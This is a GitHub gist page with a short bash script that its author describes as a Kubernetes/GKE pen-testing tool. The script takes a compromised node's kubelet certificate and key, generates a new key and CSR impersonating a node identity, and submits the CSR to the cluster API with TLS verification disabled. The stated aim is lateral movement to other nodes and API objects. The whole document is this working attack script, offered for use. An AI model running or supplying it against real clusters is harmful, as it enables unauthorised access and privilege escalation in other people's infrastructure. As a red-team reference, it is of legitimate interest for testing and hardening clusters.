Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
quick script used during some exploratory GKE/k8s cluster pen-testing. Goal was to use a compromised node's kubelet to move laterally thru the cluster to other nodes and api objects
#!/bin/bash
set -e
NODE_NAME="${NODE_NAME:-random-node-name}"
KUBE_API="${KUBE_API:-35.226.10.2}"
KUBELET_KEY="${KUBELET_KEY:-/etc/srv/kubernetes/pki/kubelet.key}"
KUBELET_CERT="${KUBELET_CERT:-/etc/srv/kubernetes/pki/kubelet.crt}"
WORKDIR="$(mktemp -d /tmp/foo.XXXXX)"
echo "==> Creating new key + CSR: $WORKDIR/k8shack.{key,csr}"
openssl req -nodes -newkey rsa:2048 -keyout "$WORKDIR/k8shack.key" -out "$WORKDIR/k8shack.csr" -subj "/O=system:nodes/CN=system:node:${NODE_NAME}"
echo "==> Creating k8s CertificateSigningRequest yaml: $WORKDIR/k8shack-csr.yaml"
cat <<EOF >"$WORKDIR/k8shack-csr.yaml"
apiVersion: certificates.k8s.io/v1beta1
kind: CertificateSigningRequest
metadata:
name: node-csr-$NODE_NAME-$(date +%s)
spec:
groups:
- system:nodes
request: $(cat "$WORKDIR/k8shack.csr" | base64 | tr -d '\n')
usages:
- digital signature
- key encipherment
- client auth
EOF
echo "==> Uploading CSR yaml to k8s api"
kubectl --insecure-skip-tls-verify \
--client-certificate "$KUBELET_CERT" \
--client-key "$KUBELET_KEY" \
--server https://"$KUBE_API" \
create -f "$WORKDIR/k8shack-csr.yaml"
echo "==> Sleeping 3 seconds to give the API time to process the CSR... "
sleep 3
echo "==> Status of Pending CSR:"
kubectl --client-certificate "$KUBELET_CERT" \
--client-key "$KUBELET_KEY" \
--insecure-skip-tls-verify \
--server https://"$KUBE_API" \
get certificatesigningrequests
rm -rf -- "$WORKDIR"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.